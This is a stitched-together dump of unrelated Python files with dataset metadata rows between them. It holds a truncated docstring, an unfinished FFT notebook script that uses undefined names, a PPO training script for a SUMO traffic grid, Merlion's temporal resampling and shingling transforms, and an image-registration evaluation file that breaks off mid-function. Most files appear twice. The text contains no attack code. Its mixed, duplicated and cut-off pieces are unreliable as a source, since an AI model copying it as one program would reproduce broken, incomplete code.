allocator : MemoryAllocator, optional Controller for memory allocation. To be used, for example, when one wants to take advantage of the memory hierarchy in a NUMA architecture. Refer to `default_allocator.__doc__` for more information. **kwargs Mapper of Operator overrides. Used to automatically derive the shape if not explicitly provided. # Set new values and re-derive defaults # Pickling support Tensor symbol that "aliases" another DiscreteFunction. Aliasing here means that the AliasFunction logically represents another object. This is most commonly used when we have a generic routine `foo(af, ...)` that we need to apply to multiple DiscreteFunctions; here `af` is an AliasFunction, used in the body of `foo`. Like a TempFunction, an AliasFunction does not carry data. # Any attempt at allocating data by the user should fail miserably
| 1.879975
| 2
|
TFLCycles/unfinished/fourier.py
|
stanton119/data-analysis
| 0
|
6627584
|
<reponame>stanton119/data-analysis<filename>TFLCycles/unfinished/fourier.py
# %% Time results using fft
# NOTE(review): this is a notebook-style scratch cell ("unfinished"). It uses
# `plt` (matplotlib.pyplot) without importing it and references a DataFrame
# `temp` that is never defined here — presumably both come from a preceding
# notebook cell. The script will raise NameError if run standalone; confirm
# the missing imports/definitions before reuse.
import numpy as np
import scipy.fftpack
# Number of samplepoints
N = 600
# sample spacing
T = 1.0 / 800.0
x = np.linspace(0.0, N * T, N)
# Synthetic test signal: 50 Hz sine plus a half-amplitude 80 Hz sine
y = np.sin(50.0 * 2.0 * np.pi * x) + 0.5 * np.sin(80.0 * 2.0 * np.pi * x)
yf = scipy.fftpack.fft(y)
# Positive-frequency axis up to the Nyquist frequency 1/(2T)
xf = np.linspace(0.0, 1.0 / (2.0 * T), int(N / 2))
plt.plot(x, y, ".")
fig, ax = plt.subplots()
# Plot single-sided amplitude spectrum (2/N normalization, first N/2 bins)
ax.plot(xf, 2.0 / N * np.abs(yf[: N // 2]))
plt.show()
temp.loc[:, ["datetimeint", "count"]]
# Mean-centered count series, as a numpy array
norm_count = (temp["count"] - temp["count"].mean()).to_numpy()
norm_count.shape
yf = scipy.fftpack.fft(norm_count,)
xf = temp["datetimeint"]
temp["datetimeint"].max() - temp["datetimeint"].min()
# np.linspace(0.0, 1.0/(2.0*T), int(N/2))
fig, ax = plt.subplots()
ax.plot(xf, 2.0 / N * np.abs(yf))
# NOTE(review): this reuses N=600 for normalization and slices yf[:N//2]
# against xf of a different length — likely a shape mismatch; verify.
ax.plot(xf, 2.0 / N * np.abs(yf[: N // 2]))
plt.show()
# Inspect the sampling interval of the datetime index
plt.plot(temp["datetimeint"].diff())
temp["datetimeint"].diff()[1]
temp["datetimeint"][:2]
Y = np.fft.fft(norm_count)
# Frequency bins from the (assumed uniform) sample spacing — TODO confirm
# the series is actually uniformly sampled before trusting these frequencies.
freq = np.fft.fftfreq(len(norm_count), temp["datetimeint"].diff()[1])
plt.figure()
plt.plot(freq, np.abs(Y), ".")
plt.figure()
plt.plot(freq, np.angle(Y))
plt.show()
# %% [markdown]
# Convert to jupyter notebook -> Export current (no output)
# # Convert to markdown file
# `jupyter nbconvert data_proc.ipynb --to markdown`
|
# %% Time results using fft
# NOTE(review): duplicate copy of the scratch cell above (dataset
# "content_cleaned" column). `plt` is used without importing matplotlib and
# `temp` is never defined here — NameError if run standalone.
import numpy as np
import scipy.fftpack
# Number of samplepoints
N = 600
# sample spacing
T = 1.0 / 800.0
x = np.linspace(0.0, N * T, N)
# Synthetic test signal: 50 Hz sine plus a half-amplitude 80 Hz sine
y = np.sin(50.0 * 2.0 * np.pi * x) + 0.5 * np.sin(80.0 * 2.0 * np.pi * x)
yf = scipy.fftpack.fft(y)
# Positive-frequency axis up to the Nyquist frequency 1/(2T)
xf = np.linspace(0.0, 1.0 / (2.0 * T), int(N / 2))
plt.plot(x, y, ".")
fig, ax = plt.subplots()
# Single-sided amplitude spectrum (2/N normalization, first N/2 bins)
ax.plot(xf, 2.0 / N * np.abs(yf[: N // 2]))
plt.show()
temp.loc[:, ["datetimeint", "count"]]
# Mean-centered count series, as a numpy array
norm_count = (temp["count"] - temp["count"].mean()).to_numpy()
norm_count.shape
yf = scipy.fftpack.fft(norm_count,)
xf = temp["datetimeint"]
temp["datetimeint"].max() - temp["datetimeint"].min()
# np.linspace(0.0, 1.0/(2.0*T), int(N/2))
fig, ax = plt.subplots()
ax.plot(xf, 2.0 / N * np.abs(yf))
# NOTE(review): N=600 normalization and yf[:N//2] slice against an xf of a
# different length — likely shape mismatch; verify.
ax.plot(xf, 2.0 / N * np.abs(yf[: N // 2]))
plt.show()
# Inspect the sampling interval of the datetime index
plt.plot(temp["datetimeint"].diff())
temp["datetimeint"].diff()[1]
temp["datetimeint"][:2]
Y = np.fft.fft(norm_count)
# Frequency bins from the (assumed uniform) sample spacing — TODO confirm
# uniform sampling before trusting these frequencies.
freq = np.fft.fftfreq(len(norm_count), temp["datetimeint"].diff()[1])
plt.figure()
plt.plot(freq, np.abs(Y), ".")
plt.figure()
plt.plot(freq, np.angle(Y))
plt.show()
# %% [markdown]
# Convert to jupyter notebook -> Export current (no output)
# # Convert to markdown file
# `jupyter nbconvert data_proc.ipynb --to markdown`
|
en
| 0.538583
|
# %% Time results using fft # Number of samplepoints # sample spacing # np.linspace(0.0, 1.0/(2.0*T), int(N/2)) # %% [markdown] # Convert to jupyter notebook -> Export current (no output) # # Convert to markdown file # `jupyter nbconvert data_proc.ipynb --to markdown`
| 2.384575
| 2
|
experiments/sb3_grid4x4.py
|
evantancy/sumo-rl
| 0
|
6627585
|
<reponame>evantancy/sumo-rl
from stable_baselines3 import PPO
import sumo_rl
import supersuit as ss
from stable_baselines3.common.vec_env import VecMonitor
from stable_baselines3.common.evaluation import evaluate_policy
# NOTE(review): EvalCallback and numpy are imported but never used below.
from stable_baselines3.common.callbacks import EvalCallback
import numpy as np
if __name__ == "__main__":
    # SUMO 4x4-grid traffic-signal environment; per-episode metrics go to CSV
    env = sumo_rl.grid4x4(use_gui=True, out_csv_name="outputs/grid4x4/ppo_test")
    # Convert the PettingZoo multi-agent env into a vectorized env, then stack
    # 2 copies behind an SB3-compatible vector interface
    env = ss.pettingzoo_env_to_vec_env_v0(env)
    env = ss.concat_vec_envs_v0(env, 2, num_cpus=1, base_class="stable_baselines3")
    env = VecMonitor(env)
    # PPO hyperparameters — presumably from a tuning run; confirm before reuse
    model = PPO(
        "MlpPolicy",
        env,
        verbose=3,
        gamma=0.95,
        n_steps=256,
        ent_coef=0.0905168,
        learning_rate=0.00062211,
        vf_coef=0.042202,
        max_grad_norm=0.9,
        gae_lambda=0.99,
        n_epochs=5,
        clip_range=0.3,
        batch_size=256,
    )
    model.learn(total_timesteps=100000)
    # Report mean/std episodic reward over 10 evaluation episodes
    mean_reward, std_reward = evaluate_policy(model, env, n_eval_episodes=10)
    print(mean_reward)
    print(std_reward)
|
from stable_baselines3 import PPO
import sumo_rl
import supersuit as ss
from stable_baselines3.common.vec_env import VecMonitor
from stable_baselines3.common.evaluation import evaluate_policy
# NOTE(review): duplicate copy of the script above; EvalCallback and numpy
# are imported but never used below.
from stable_baselines3.common.callbacks import EvalCallback
import numpy as np
if __name__ == "__main__":
    # SUMO 4x4-grid traffic-signal environment; per-episode metrics go to CSV
    env = sumo_rl.grid4x4(use_gui=True, out_csv_name="outputs/grid4x4/ppo_test")
    # Vectorize the PettingZoo multi-agent env and stack 2 copies behind an
    # SB3-compatible vector interface
    env = ss.pettingzoo_env_to_vec_env_v0(env)
    env = ss.concat_vec_envs_v0(env, 2, num_cpus=1, base_class="stable_baselines3")
    env = VecMonitor(env)
    # PPO hyperparameters — presumably from a tuning run; confirm before reuse
    model = PPO(
        "MlpPolicy",
        env,
        verbose=3,
        gamma=0.95,
        n_steps=256,
        ent_coef=0.0905168,
        learning_rate=0.00062211,
        vf_coef=0.042202,
        max_grad_norm=0.9,
        gae_lambda=0.99,
        n_epochs=5,
        clip_range=0.3,
        batch_size=256,
    )
    model.learn(total_timesteps=100000)
    # Report mean/std episodic reward over 10 evaluation episodes
    mean_reward, std_reward = evaluate_policy(model, env, n_eval_episodes=10)
    print(mean_reward)
    print(std_reward)
|
none
| 1
| 1.79698
| 2
|
|
merlion/transform/resample.py
|
ankitakashyap05/Merlion
| 1
|
6627586
|
<filename>merlion/transform/resample.py
#
# Copyright (c) 2021 salesforce.com, inc.
# All rights reserved.
# SPDX-License-Identifier: BSD-3-Clause
# For full license text, see the LICENSE file in the repo root or https://opensource.org/licenses/BSD-3-Clause
#
"""
Transforms that resample the input in time, or stack adjacent observations
into vectors.
"""
from collections import OrderedDict
import logging
from typing import List, Tuple, Union
import numpy as np
from merlion.transform.base import TransformBase, InvertibleTransformBase
from merlion.utils import UnivariateTimeSeries, TimeSeries
from merlion.utils.resample import (
granularity_str_to_seconds,
get_gcd_timedelta,
reindex_df,
AlignPolicy,
AggregationPolicy,
MissingValuePolicy,
)
logger = logging.getLogger(__name__)
class TemporalResample(TransformBase):
    """
    Defines a policy to temporally resample a time series at a specified
    granularity. Note that while this transform does support inversion, the
    recovered time series may differ from the input due to information loss
    when downsampling.
    """

    def __init__(
        self,
        granularity: Union[str, int, float] = None,
        origin: int = None,
        trainable_granularity: bool = None,
        remove_non_overlapping=True,
        aggregation_policy: Union[str, AggregationPolicy] = "Mean",
        missing_value_policy: Union[str, MissingValuePolicy] = "Interpolate",
    ):
        """
        Defines a policy to temporally resample a time series.

        :param granularity: The granularity at which we want to resample.
        :param origin: The time stamp defining the offset to start at.
        :param trainable_granularity: Whether the granularity is trainable,
            i.e. train() will set it to the GCD timedelta of a time series.
            If ``None`` (default), it will be trainable only if no granularity is
            explicitly given.
        :param remove_non_overlapping: If ``True``, we will only keep the portions
            of the univariates that overlap with each other. For example, if we
            have 3 univariates which span timestamps [0, 3600], [60, 3660], and
            [30, 3540], we will only keep timestamps in the range [60, 3540]. If
            ``False``, we will keep all timestamps produced by the resampling.
        :param aggregation_policy: The policy we will use to aggregate multiple
            values in a window (downsampling).
        :param missing_value_policy: The policy we will use to impute missing
            values (upsampling).
        """
        super().__init__()
        # Granularity may be given as a string (e.g. "1h"); normalize to seconds
        if not isinstance(granularity, (int, float)):
            granularity = granularity_str_to_seconds(granularity)
        self.granularity = granularity
        self.origin = origin
        # By default, the granularity is trainable iff it wasn't given explicitly
        if trainable_granularity is None:
            trainable_granularity = granularity is None
        self.trainable_granularity = trainable_granularity
        self.remove_non_overlapping = remove_non_overlapping
        self.aggregation_policy = aggregation_policy
        self.missing_value_policy = missing_value_policy

    @property
    def requires_inversion_state(self):
        # Inversion needs no saved state: it is a (lossy) identity
        return False

    @property
    def aggregation_policy(self) -> AggregationPolicy:
        return self._aggregation_policy

    @aggregation_policy.setter
    def aggregation_policy(self, agg: Union[str, AggregationPolicy]):
        # Accept either an enum member or its string name
        if isinstance(agg, str):
            valid = set(AggregationPolicy.__members__.keys())
            if agg not in valid:
                raise KeyError(f"{agg} is not a valid aggregation policy. Valid aggregation policies are: {valid}")
            agg = AggregationPolicy[agg]
        self._aggregation_policy = agg

    @property
    def missing_value_policy(self) -> MissingValuePolicy:
        return self._missing_value_policy

    @missing_value_policy.setter
    def missing_value_policy(self, mv: Union[str, MissingValuePolicy]):
        # Accept either an enum member or its string name
        if isinstance(mv, str):
            valid = set(MissingValuePolicy.__members__.keys())
            # FIX: error message previously said "aggregation policies" here
            # (copy-paste from the setter above); it now names the right policy.
            if mv not in valid:
                raise KeyError(f"{mv} is not a valid missing value policy. Valid missing value policies are: {valid}")
            mv = MissingValuePolicy[mv]
        self._missing_value_policy = mv

    def train(self, time_series: TimeSeries):
        """Learn the granularity/origin from ``time_series`` if trainable."""
        if self.trainable_granularity:
            # Use the GCD of all univariates' timedeltas as the granularity
            self.granularity = get_gcd_timedelta(*[var.time_stamps for var in time_series.univariates])

        if self.trainable_granularity or self.origin is None:
            t0, tf = time_series.t0, time_series.tf
            # Align the origin so the final timestamp falls exactly on a
            # resampled point
            if self.granularity:
                offset = (tf - t0) % self.granularity
            else:
                offset = 0
            self.origin = t0 + offset

    def __call__(self, time_series: TimeSeries) -> TimeSeries:
        # Without a granularity we cannot resample; warn and pass through
        if self.granularity is None:
            logger.warning(
                f"Skipping resampling step because granularity is "
                f"None. Please either specify a granularity or train "
                f"this transformation on a time series."
            )
            return time_series
        return time_series.align(
            alignment_policy=AlignPolicy.FixedGranularity,
            granularity=self.granularity,
            origin=self.origin,
            remove_non_overlapping=self.remove_non_overlapping,
            aggregation_policy=self.aggregation_policy,
            missing_value_policy=self.missing_value_policy,
        )
class Shingle(InvertibleTransformBase):
    """
    Stacks adjacent observations into a single vector. Downsamples by the
    specified stride (less than or equal to the shingle size) if desired.
    More concretely, consider an input time series,
    .. code-block:: python
        TimeSeries(
            UnivariateTimeSeries((t1[0], x1[0]), ..., (t1[m], x1[m])),
            UnivariateTimeSeries((t2[0], x2[0]), ..., (t2[m], x2[m])),
        )
    Applying a shingle of size 3 and stride 2 will yield
    .. code-block:: python
        TimeSeries(
            UnivariateTimeSeries((t1[0], x1[0]), (t1[2], x1[2]), ..., (t1[m-2], x1[m-2])),
            UnivariateTimeSeries((t1[1], x1[1]), (t1[3], x1[3]), ..., (t1[m-1], x1[m-1])),
            UnivariateTimeSeries((t1[2], x1[2]), (t1[4], x1[4]), ..., (t1[m], x1[m])),
            UnivariateTimeSeries((t2[0], x2[0]), (t2[2], x2[2]), ..., (t2[m-2], x2[m-2])),
            UnivariateTimeSeries((t2[1], x2[1]), (t2[3], x2[3]), ..., (t2[m-1], x2[m-1])),
            UnivariateTimeSeries((t2[2], x2[2]), (t2[4], x2[4]), ..., (t2[m], x2[m])),
        )
    If the length of any univariate is not perfectly divisible by the stride, we
    will pad it on the left side with the first value in the univariate.
    """
    def __init__(self, size: int = 1, stride: int = 1, multivar_skip=True):
        """
        Converts the time series into shingle vectors of the appropriate size.
        This converts each univariate into a multivariate time series with
        ``size`` variables.
        :param size: let x(t) = value_t be the value of the time series at
            time index t. Then, the output vector for time index t will be
            :code:`[x(t - size + 1), ..., x(t - 1), x(t)]`.
        :param stride: The stride at which the output vectors are downsampled.
        :param multivar_skip: Whether to skip this transform if the transform
            is already multivariate.
        """
        super().__init__()
        assert size >= 0
        assert 1 <= stride <= size
        self.stride = stride
        self.size = size
        self.multivar_skip = multivar_skip
    def train(self, time_series: TimeSeries):
        # Shingling has no trainable parameters.
        pass
    def __call__(self, time_series: TimeSeries) -> TimeSeries:
        # Optionally pass multivariate inputs through unchanged, marking the
        # inversion state so _invert is a no-op too.
        if self.multivar_skip and time_series.dim > 1:
            self.inversion_state = "skip"
            return time_series
        new_vars = OrderedDict()
        for name, var in time_series.items():
            # Left-pad the time series with the first value
            x0 = var.np_values[0]
            vals = np.concatenate((np.full(self.size - 1, x0), var.np_values))
            # Stack adjacent observations into vectors of length self.size,
            # and apply any striding desired.  i0 phases the stride so that
            # the final observation (index len(var) - 1) is always included.
            i0 = (len(var) - 1) % self.stride
            times = var.index[i0 :: self.stride]
            all_vals = np.stack([vals[i : len(vals) - self.size + i + 1] for i in range(self.size)])
            all_vals = all_vals[:, i0 :: self.stride]
            # Convert the stacked values into UnivariateTimeSeries objects,
            # one output univariate per shingle lag, named f"{name}_{lag}".
            new_vars.update(
                OrderedDict([(f"{name}_{i}", UnivariateTimeSeries(times, x)) for i, x in enumerate(all_vals)])
            )
        # The inversion state is just the timestamps of the univariates before
        # shingling occurs, and the name of the original univariate
        self.inversion_state = [(name, v.index) for name, v in time_series.items()]
        return TimeSeries(new_vars)
    def _invert(self, time_series: TimeSeries) -> TimeSeries:
        # Forward pass was skipped for multivariate input -> inversion no-op.
        if self.inversion_state == "skip":
            return time_series
        new_vars = OrderedDict()
        for i, (name, time_stamps) in enumerate(self.inversion_state):
            vals = []
            # Each original univariate was expanded into self.size contiguous
            # univariates named f"{name}_0", ..., f"{name}_{size-1}".
            expected_src_names = [f"{name}_{i}" for i in range(self.size)]
            src_names = time_series.names[i * self.size : (i + 1) * self.size]
            src = TimeSeries(OrderedDict([(k, time_series.univariates[k]) for k in src_names]))
            assert src.is_aligned and src.dim == self.size, (
                f"{self} should convert a univariate time series into an "
                f"aligned multivariate time series of dim {self.size}, but "
                f"something went wrong."
            )
            assert (
                src.names == expected_src_names
            ), f"Expected univariates named {expected_src_names}, but got {src.names}"
            # Walk the shingle vectors newest-first; each reversed vector
            # contributes only the values not yet recovered.
            for j, (t, val_vec) in enumerate(src[::-1]):
                j0 = j * self.stride
                val_vec = val_vec[::-1]
                vals.extend(val_vec[len(vals) - j0 :])
            # vals was built newest-first: reverse back to chronological order
            # and keep exactly len(time_stamps) values (drops the padding).
            vals = vals[len(time_stamps) :: -1][-len(time_stamps) :]
            new_vars[name] = UnivariateTimeSeries(time_stamps, vals)
        return TimeSeries(new_vars)
|
<filename>merlion/transform/resample.py
#
# Copyright (c) 2021 salesforce.com, inc.
# All rights reserved.
# SPDX-License-Identifier: BSD-3-Clause
# For full license text, see the LICENSE file in the repo root or https://opensource.org/licenses/BSD-3-Clause
#
"""
Transforms that resample the input in time, or stack adjacent observations
into vectors.
"""
from collections import OrderedDict
import logging
from typing import List, Tuple, Union
import numpy as np
from merlion.transform.base import TransformBase, InvertibleTransformBase
from merlion.utils import UnivariateTimeSeries, TimeSeries
from merlion.utils.resample import (
granularity_str_to_seconds,
get_gcd_timedelta,
reindex_df,
AlignPolicy,
AggregationPolicy,
MissingValuePolicy,
)
logger = logging.getLogger(__name__)
class TemporalResample(TransformBase):
    """
    Defines a policy to temporally resample a time series at a specified
    granularity. Note that while this transform does support inversion, the
    recovered time series may differ from the input due to information loss
    when downsampling.
    """

    def __init__(
        self,
        granularity: Union[str, int, float] = None,
        origin: int = None,
        trainable_granularity: bool = None,
        remove_non_overlapping=True,
        aggregation_policy: Union[str, AggregationPolicy] = "Mean",
        missing_value_policy: Union[str, MissingValuePolicy] = "Interpolate",
    ):
        """
        Defines a policy to temporally resample a time series.

        :param granularity: The granularity at which we want to resample.
        :param origin: The time stamp defining the offset to start at.
        :param trainable_granularity: Whether the granularity is trainable,
            i.e. train() will set it to the GCD timedelta of a time series.
            If ``None`` (default), it will be trainable only if no granularity
            is explicitly given.
        :param remove_non_overlapping: If ``True``, we will only keep the
            portions of the univariates that overlap with each other. For
            example, if we have 3 univariates which span timestamps [0, 3600],
            [60, 3660], and [30, 3540], we will only keep timestamps in the
            range [60, 3540]. If ``False``, we will keep all timestamps
            produced by the resampling.
        :param aggregation_policy: The policy we will use to aggregate multiple
            values in a window (downsampling).
        :param missing_value_policy: The policy we will use to impute missing
            values (upsampling).
        """
        super().__init__()
        # Normalize a string granularity (e.g. "1h") to a number of seconds.
        if not isinstance(granularity, (int, float)):
            granularity = granularity_str_to_seconds(granularity)
        self.granularity = granularity
        self.origin = origin
        # By default, the granularity is trainable iff it was not given.
        if trainable_granularity is None:
            trainable_granularity = granularity is None
        self.trainable_granularity = trainable_granularity
        self.remove_non_overlapping = remove_non_overlapping
        # These assignments go through the property setters below, which
        # validate strings and convert them to enum members.
        self.aggregation_policy = aggregation_policy
        self.missing_value_policy = missing_value_policy

    @property
    def requires_inversion_state(self):
        # No per-call state is needed to (approximately) invert a resampling.
        return False

    @property
    def aggregation_policy(self) -> AggregationPolicy:
        """The `AggregationPolicy` used to aggregate values when downsampling."""
        return self._aggregation_policy

    @aggregation_policy.setter
    def aggregation_policy(self, agg: Union[str, AggregationPolicy]):
        if isinstance(agg, str):
            valid = set(AggregationPolicy.__members__.keys())
            if agg not in valid:
                raise KeyError(f"{agg} is not a valid aggregation policy. Valid aggregation policies are: {valid}")
            agg = AggregationPolicy[agg]
        self._aggregation_policy = agg

    @property
    def missing_value_policy(self) -> MissingValuePolicy:
        """The `MissingValuePolicy` used to impute missing values when upsampling."""
        return self._missing_value_policy

    @missing_value_policy.setter
    def missing_value_policy(self, mv: Union[str, MissingValuePolicy]):
        if isinstance(mv, str):
            valid = set(MissingValuePolicy.__members__.keys())
            if mv not in valid:
                # Bug fix: this message previously said "aggregation policies"
                # (copy-paste from the aggregation_policy setter).
                raise KeyError(f"{mv} is not a valid missing value policy. Valid missing value policies are: {valid}")
            mv = MissingValuePolicy[mv]
        self._missing_value_policy = mv

    def train(self, time_series: TimeSeries):
        # Learn the granularity as the GCD timedelta over all univariates.
        if self.trainable_granularity:
            self.granularity = get_gcd_timedelta(*[var.time_stamps for var in time_series.univariates])
        # Choose an origin such that tf - origin is an exact multiple of the
        # granularity, so the resampled grid ends exactly at tf.
        if self.trainable_granularity or self.origin is None:
            t0, tf = time_series.t0, time_series.tf
            if self.granularity:
                offset = (tf - t0) % self.granularity
            else:
                offset = 0
            self.origin = t0 + offset

    def __call__(self, time_series: TimeSeries) -> TimeSeries:
        if self.granularity is None:
            # Nothing to resample to; warn and pass the input through.
            logger.warning(
                "Skipping resampling step because granularity is "
                "None. Please either specify a granularity or train "
                "this transformation on a time series."
            )
            return time_series
        return time_series.align(
            alignment_policy=AlignPolicy.FixedGranularity,
            granularity=self.granularity,
            origin=self.origin,
            remove_non_overlapping=self.remove_non_overlapping,
            aggregation_policy=self.aggregation_policy,
            missing_value_policy=self.missing_value_policy,
        )
class Shingle(InvertibleTransformBase):
    """
    Stacks adjacent observations into a single vector. Downsamples by the
    specified stride (less than or equal to the shingle size) if desired.
    More concretely, consider an input time series,
    .. code-block:: python
        TimeSeries(
            UnivariateTimeSeries((t1[0], x1[0]), ..., (t1[m], x1[m])),
            UnivariateTimeSeries((t2[0], x2[0]), ..., (t2[m], x2[m])),
        )
    Applying a shingle of size 3 and stride 2 will yield
    .. code-block:: python
        TimeSeries(
            UnivariateTimeSeries((t1[0], x1[0]), (t1[2], x1[2]), ..., (t1[m-2], x1[m-2])),
            UnivariateTimeSeries((t1[1], x1[1]), (t1[3], x1[3]), ..., (t1[m-1], x1[m-1])),
            UnivariateTimeSeries((t1[2], x1[2]), (t1[4], x1[4]), ..., (t1[m], x1[m])),
            UnivariateTimeSeries((t2[0], x2[0]), (t2[2], x2[2]), ..., (t2[m-2], x2[m-2])),
            UnivariateTimeSeries((t2[1], x2[1]), (t2[3], x2[3]), ..., (t2[m-1], x2[m-1])),
            UnivariateTimeSeries((t2[2], x2[2]), (t2[4], x2[4]), ..., (t2[m], x2[m])),
        )
    If the length of any univariate is not perfectly divisible by the stride, we
    will pad it on the left side with the first value in the univariate.
    """
    def __init__(self, size: int = 1, stride: int = 1, multivar_skip=True):
        """
        Converts the time series into shingle vectors of the appropriate size.
        This converts each univariate into a multivariate time series with
        ``size`` variables.
        :param size: let x(t) = value_t be the value of the time series at
            time index t. Then, the output vector for time index t will be
            :code:`[x(t - size + 1), ..., x(t - 1), x(t)]`.
        :param stride: The stride at which the output vectors are downsampled.
        :param multivar_skip: Whether to skip this transform if the transform
            is already multivariate.
        """
        super().__init__()
        assert size >= 0
        assert 1 <= stride <= size
        self.stride = stride
        self.size = size
        self.multivar_skip = multivar_skip
    def train(self, time_series: TimeSeries):
        # Shingling has no trainable parameters.
        pass
    def __call__(self, time_series: TimeSeries) -> TimeSeries:
        # Optionally pass multivariate inputs through unchanged, marking the
        # inversion state so _invert is a no-op too.
        if self.multivar_skip and time_series.dim > 1:
            self.inversion_state = "skip"
            return time_series
        new_vars = OrderedDict()
        for name, var in time_series.items():
            # Left-pad the time series with the first value
            x0 = var.np_values[0]
            vals = np.concatenate((np.full(self.size - 1, x0), var.np_values))
            # Stack adjacent observations into vectors of length self.size,
            # and apply any striding desired.  i0 phases the stride so that
            # the final observation (index len(var) - 1) is always included.
            i0 = (len(var) - 1) % self.stride
            times = var.index[i0 :: self.stride]
            all_vals = np.stack([vals[i : len(vals) - self.size + i + 1] for i in range(self.size)])
            all_vals = all_vals[:, i0 :: self.stride]
            # Convert the stacked values into UnivariateTimeSeries objects,
            # one output univariate per shingle lag, named f"{name}_{lag}".
            new_vars.update(
                OrderedDict([(f"{name}_{i}", UnivariateTimeSeries(times, x)) for i, x in enumerate(all_vals)])
            )
        # The inversion state is just the timestamps of the univariates before
        # shingling occurs, and the name of the original univariate
        self.inversion_state = [(name, v.index) for name, v in time_series.items()]
        return TimeSeries(new_vars)
    def _invert(self, time_series: TimeSeries) -> TimeSeries:
        # Forward pass was skipped for multivariate input -> inversion no-op.
        if self.inversion_state == "skip":
            return time_series
        new_vars = OrderedDict()
        for i, (name, time_stamps) in enumerate(self.inversion_state):
            vals = []
            # Each original univariate was expanded into self.size contiguous
            # univariates named f"{name}_0", ..., f"{name}_{size-1}".
            expected_src_names = [f"{name}_{i}" for i in range(self.size)]
            src_names = time_series.names[i * self.size : (i + 1) * self.size]
            src = TimeSeries(OrderedDict([(k, time_series.univariates[k]) for k in src_names]))
            assert src.is_aligned and src.dim == self.size, (
                f"{self} should convert a univariate time series into an "
                f"aligned multivariate time series of dim {self.size}, but "
                f"something went wrong."
            )
            assert (
                src.names == expected_src_names
            ), f"Expected univariates named {expected_src_names}, but got {src.names}"
            # Walk the shingle vectors newest-first; each reversed vector
            # contributes only the values not yet recovered.
            for j, (t, val_vec) in enumerate(src[::-1]):
                j0 = j * self.stride
                val_vec = val_vec[::-1]
                vals.extend(val_vec[len(vals) - j0 :])
            # vals was built newest-first: reverse back to chronological order
            # and keep exactly len(time_stamps) values (drops the padding).
            vals = vals[len(time_stamps) :: -1][-len(time_stamps) :]
            new_vars[name] = UnivariateTimeSeries(time_stamps, vals)
        return TimeSeries(new_vars)
|
en
| 0.816088
|
# # Copyright (c) 2021 salesforce.com, inc. # All rights reserved. # SPDX-License-Identifier: BSD-3-Clause # For full license text, see the LICENSE file in the repo root or https://opensource.org/licenses/BSD-3-Clause # Transforms that resample the input in time, or stack adjacent observations into vectors. Defines a policy to temporally resample a time series at a specified granularity. Note that while this transform does support inversion, the recovered time series may differ from the input due to information loss when downsampling. Defines a policy to temporally resample a time series. :param granularity: The granularity at which we want to resample. :param origin: The time stamp defining the offset to start at. :param trainable_granularity: Whether the granularity is trainable, i.e. train() will set it to the GCD timedelta of a time series. If ``None`` (default), it will be trainable only if no granularity is explicitly given. :param remove_non_overlapping: If ``True``, we will only keep the portions of the univariates that overlap with each other. For example, if we have 3 univariates which span timestamps [0, 3600], [60, 3660], and [30, 3540], we will only keep timestamps in the range [60, 3540]. If ``False``, we will keep all timestamps produced by the resampling. :param aggregation_policy: The policy we will use to aggregate multiple values in a window (downsampling). :param missing_value_policy: The policy we will use to impute missing values (upsampling). Stacks adjacent observations into a single vector. Downsamples by the specified stride (less than or equal to the shingle size) if desired. More concretely, consider an input time series, .. code-block:: python TimeSeries( UnivariateTimeSeries((t1[0], x1[0]), ..., (t1[m], t1[m])), UnivariateTimeSeries((t2[0], x2[0]), ..., (t2[m], t2[m])), ) Applying a shingle of size 3 and stride 2 will yield .. 
code-block:: python TimeSeries( UnivariateTimeSeries((t1[0], x1[0]), (t1[2], x1[2]), ..., (t1[m-2], x1[m-2])), UnivariateTimeSeries((t1[1], x1[1]), (t1[3], x1[3]), ..., (t1[m-1], x1[m-1])), UnivariateTimeSeries((t1[2], x1[2]), (t1[4], x1[4]), ..., (t1[m], x1[m])), UnivariateTimeSeries((t2[0], x2[0]), (t2[2], x2[2]), ..., (t2[m-2], x2[m-2])), UnivariateTimeSeries((t2[1], x2[1]), (t2[3], x2[3]), ..., (t2[m-1], x2[m-1])), UnivariateTimeSeries((t2[2], x2[2]), (t2[4], x2[4]), ..., (t2[m], x2[m])), ) If the length of any univariate is not perfectly divisible by the stride, we will pad it on the left side with the first value in the univariate. Converts the time series into shingle vectors of the appropriate size. This converts each univariate into a multivariate time series with ``size`` variables. :param size: let x(t) = value_t be the value of the time series at time index t. Then, the output vector for time index t will be :code:`[x(t - size + 1), ..., x(t - 1), x(t)]`. :param stride: The stride at which the output vectors are downsampled. :param multivar_skip: Whether to skip this transform if the transform is already multivariate. # Left-pad the time series with the first value # Stack adjacent observations into vectors of length self.size, # and apply any striding desired # Convert the stacked values into UnivariateTimeSeries objects # The inversion state is just the timestamps of the univariates before # shingling occurs, and the name of the original univariate
| 2.445894
| 2
|
evaluation.py
|
MingR-Ma/SEN-FCB
| 0
|
6627587
|
<filename>evaluation.py
"""Used for evaluate the registration performance"""
import numpy as np
import pystrum.pynd.ndutils as nd
def dice(array1, array2, labels):
    """
    Compute the Dice overlap between two label arrays for a set of labels.

    :parameter array1: input fixed or warped image.
    :parameter array2: input warped or fixed image.
    :parameter labels: type: 'list', the unique label number in one image pair.
    :return: a numpy array of per-label Dice scores, same length as ``labels``.
    """
    eps = np.finfo(float).eps
    scores = []
    for label in labels:
        in_a = array1 == label
        in_b = array2 == label
        intersection = np.sum(np.logical_and(in_a, in_b))
        denom = np.sum(in_a) + np.sum(in_b)
        # Guard against division by zero when a label is absent from both.
        scores.append(2 * intersection / np.maximum(denom, eps))
    return np.array(scores)
def jacobian_determinant(disp):
    """
    Compute the Jacobian determinant of a dense displacement field.

    :param disp: displacement field of shape (*vol_shape, nb_dims), where
        nb_dims is 2 or 3 and matches len(vol_shape).
    :return: array of shape vol_shape with the Jacobian determinant of the
        deformation (identity grid + displacement) at each position.
    """
    volshape = disp.shape[:-1]
    nb_dims = len(volshape)
    assert len(volshape) in (2, 3), 'deformation field has to be 2D or 3D'
    # Identity coordinate grid; equivalent to pystrum's nd.volsize2ndgrid,
    # but built with numpy only so this function needs no extra dependency.
    grid_lst = np.meshgrid(*[np.arange(d) for d in volshape], indexing="ij")
    grid = np.stack(grid_lst, len(volshape))
    # Finite-difference gradients of the deformation phi = grid + disp,
    # one array per axis (np.gradient differentiates along every axis).
    J = np.gradient(disp + grid)
    if nb_dims == 3:
        dx, dy, dz = J[0], J[1], J[2]
        # 3x3 determinant via cofactor expansion along the first row.
        Jdet0 = dx[..., 0] * (dy[..., 1] * dz[..., 2] - dy[..., 2] * dz[..., 1])
        Jdet1 = dx[..., 1] * (dy[..., 0] * dz[..., 2] - dy[..., 2] * dz[..., 0])
